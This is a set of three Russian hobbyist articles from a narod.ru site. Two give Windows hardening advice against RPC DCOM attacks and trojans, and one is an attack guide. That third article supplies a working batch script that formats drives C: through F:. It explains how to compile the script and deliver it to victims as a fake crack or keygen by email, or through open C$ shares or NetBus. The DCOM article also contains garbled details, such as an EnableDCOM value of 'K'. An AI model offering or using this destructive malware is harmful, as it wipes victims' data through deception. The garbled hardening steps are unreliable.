Оригинал: http://lwsite.narod.ru/stat/inform/RPCDCOM.htmRPC DCOM теория и практическая защита
Что же это?
Remote Procedure Call(от англ. Удалённый Вызов Процедур) - это механизм, позволяющий программе на одном компе,
выполнять произвольный код на другом удалённом компе.
Немного истории...
Некой компанией Sun Microsystems была реализована служба RPC на протоколе XDR(eXternal Data Representation)
для взаимодействия информационной службы с файловой системой. И так на основе этого бага появился эксплойт MSBlast
один из самых известных в RPC DCOM-атаках. А следом появился не менее нашумевший эксплойт RPC GUI Exploite,
написанный LSD Security Group(код) и r3l4x(графическая оболочка). После этого Microsoft не долго думая, выпустила заплатку.
И так изучить уязвимость - изучили, а теперь закроем дыру своими силами!
Защита...
Логически рассуждая можно вообще отключить службу DCOM, но есть проблема:
если мы отключаем поддержку DCOM любой COM-объект, который может быть активирован дистационно, перестанет работать!
А локальный COM + snap-in не сможет подключаться к удалённым серверам...
И функция авторегистрации сертификатов может не правильно функционировать. А так же запросы Windows Manangment Instrumentation
(WMI) удалённых серверов может неправильно функционировать. И ещё существует множество встроенных компонентов и
сторонних приложений, которые могут перестать работать!!!
Вообще Microsoft рекомендует: отключить службу DCOM(заходим в редактор реестра HKLM\Software\Microsoft\OLE
и изменяем, значение EnableDCOM с "Y" на "K") потом проверяем работоспособность всех приложений,
если будут критические ошибки, верните значение обратно... Но огорчаться не стоит ведь мы найдём выход =)
Выход из ситуации. Запускаем программу dcomcnfg(Пуск->Выполнить) инфа по проге лежит ЗДЕСЬ
Вариант второй берём любой firewall(рекомендую Outpost Firewall) и блокируем входящие пакеты на порты 135, 139, 445 и 593.
Ещё обязательно нужно поставить SP2.
Ни Администратор сайта, ни авторы статей никакой ответственности не несут.
Администратор
Оригинал: http://lwsite.narod.ru/stat/inform/ShieldOS.htmЗащита ОСи стандартными средствами.
Всё ниже написанное я советую сделать на свеже установленной ОСи!
Зайди в раздел "Администратирование" в папке "Панель управление", далее "Службы" и ищем,
что нам не нужно (вообще для нормальной работы на ПК)
Например "Рассылка системных оповещений" - эта служба больше нужна спамерам чем тебе =)
Я советую выключить (если ты ими не пользуешься) "Удалённое управление Windows(рабочем столом)",
"Telnet" и "Удалённое управление реестром".
Теперь защитим системное ПО.
Выдели самые главные службы и заходи Востанновление->Перезагрузка службы
- это предотвратит несколько видов атак на кривые сервисы!
Службы защищены, а системные файлы под угрозой! Не дадим какому-нибудь трояну шанса на
существование в нашей системе =) Для этого тебе потребуется диск, с которого ты поставил ОСь или
его копия (ВНИМАНИЕ! Имя копии диска и расположение файлов должно соответствовать оригиналу!)
и запускай ShieldFile(Хелпа по ней ЗДЕСЬ), которая будет в реальном времени следить за изменениями системных файлов!
Другой способ защиты системных файлов. Если у тебя ОСь на файловой системе NTFS, тогда
запускай проводник и лезь Сервис ->Свойства Папки->Вид и убирай галочку с "Использование простого
общего доступа к файлам" - ну вот уже не плохо!
Нам так же нужно контролировать установленный софт, а ведь троян - это тоже софт =)
Что бы никакая зараза ни смогла записать себя в системные папки(Windows и Program Files)
перезагружаем комп, заходим в безопасный режим под Администратором и запускаем проводник...
На папке Windows выбираем свойство-безопасность и запрещаем всем пользователям кроме
Администратора всё, кроме "чтение" и "выполнения". Теперь проделаем и с другими папками. Отлично! =)
Теперь перезагрузив комп не один троян не запишется к нам в системные папки! Но, а как же проги...
мы теперь не сможем их установить в эти папки.....Совсем нет, выбираем прогу для установки
контекстное меню->запустить от имени далее Администратор и пароль - прога поставлена! (Примечание
не когда не сиди под высокими правами)
Так теперь всё работает, но атаки продолжаются и нам на помощь приходит firewall
- это один из встроенных сервисов под названием ICS(я советую использовать Outpost Firewall Pro)
настроить его можно без проблем:
заходим в "Свойства соединения" на вкладку "Дополнительно" и отметим соответствующею опцию.
Далее жмём на "Параметры" и отмечаем все службы, которые необходимо разрешить(Web- ; FTP- ; SMTP-службы и т.д.).
Для мониторинга обязательно логируй и ты за огненной стеной =)
Теперь позаботимся о реестре!
Опять перезагрузи комп в безопасный режим и зайди в редактор реестра в ключах HCLM и HKCU заходи в
\Software\Microsoft\Windows\CurrentVersion\ и в ключах Run, RunOnce и RunServices проверь что
только доверенные тебе проги, но если ты поставил ОСь сейчас, то волноваться не о чем! Заходим в меню
Правка->Разрешения и снимаем права со своего логина, проделай это с остальными!
Теперь позаботимся о других троянах, которые пытаются залезть через браузер.
Заходим C:\Windows\System32\Drivers\etc\ и ищем файлы "hosts" и "Imhosts" переносим файлы в другую
папку (любую). Далее заходим в редактор реестра в раздел HKLM\SYSTEM\CurrentControlSet\Services\
Tcpip\Parameters2 и меняем значение (путь к файлам) для параметра "DataBasePath" на новый!
И обеспечим безопасность программе восстановление системных файлов: заходим HKLM\Software\Microsoft\
WindowsNT\CurrentVersion\Winlogon\ и изменяем либо значение параметра "SFCDisable" на 0, либо
переименовываем на "SFCEnable". Далее Правка->Разрешение и снимаем права со своего логина. Вот и ВСЁ =)
Ни Администратор сайта, ни авторы статей никакой ответственности не несут.
Администратор
Оригинал: http://lwsite.narod.ru/stat/inform/dosformat.htmЗападло MS-DOS'а.
Мне не раз доводилось наблюдать за глупыми юзерами не имеющими даже представление о сетевых атаках, о прозрачном проникновении на удалённую систему, а тем более о каких-то эксплоитах...
Но времена меняются юзеры умнеют, но не настолько
Так вот что делать юзеры оворужились антивирями а тут ещё не дай бог фаирволами! Но так мы же знаем что это всё РАБОТАЕТ НА СТОЛЬКО - НАСКОЛЬКО У ТЕБЯ ЗНАНИЙ ! ! ! =)
По этому поводу мы напишим следущею прогу, писать мы будем в некому не приметном БАТНИКЕ или по научному Batch file...
@echo off
move file C:\autoexec.bat
echo Format'ing you HDD!!!
echo y|format C: /q /u
echo y|format D: /q /u
echo y|format E: /q /u
echo y|format F: /q /u
echo Bye User!
exit
Теперь скачиваем прогу отсюда и в ней компилим в exe'шник!
Так теперь нам нужно как то не заметно передать файл! Вариантов много (как дыр!) я рассмотрю два из них:
Первый.
Мы можем впарить его юзеру например отправив по мылу как какой нибудь нужный кряк или кейген! Антивирь нас не узнает!
Второй.
Так же можно реализовать атаку на удалённый комп. просканить на открытые порты и если порт 21 или 139(возможно и на другие - пример автора) открыты, то принемаем меры
Либо в адресной строке браузере пишем //ip_or_name/C$ либо качаем прогу NetBus и открываем комп!
Ни Администратор сайта, ни авторы статей никакой ответственности не несут.
Администратор
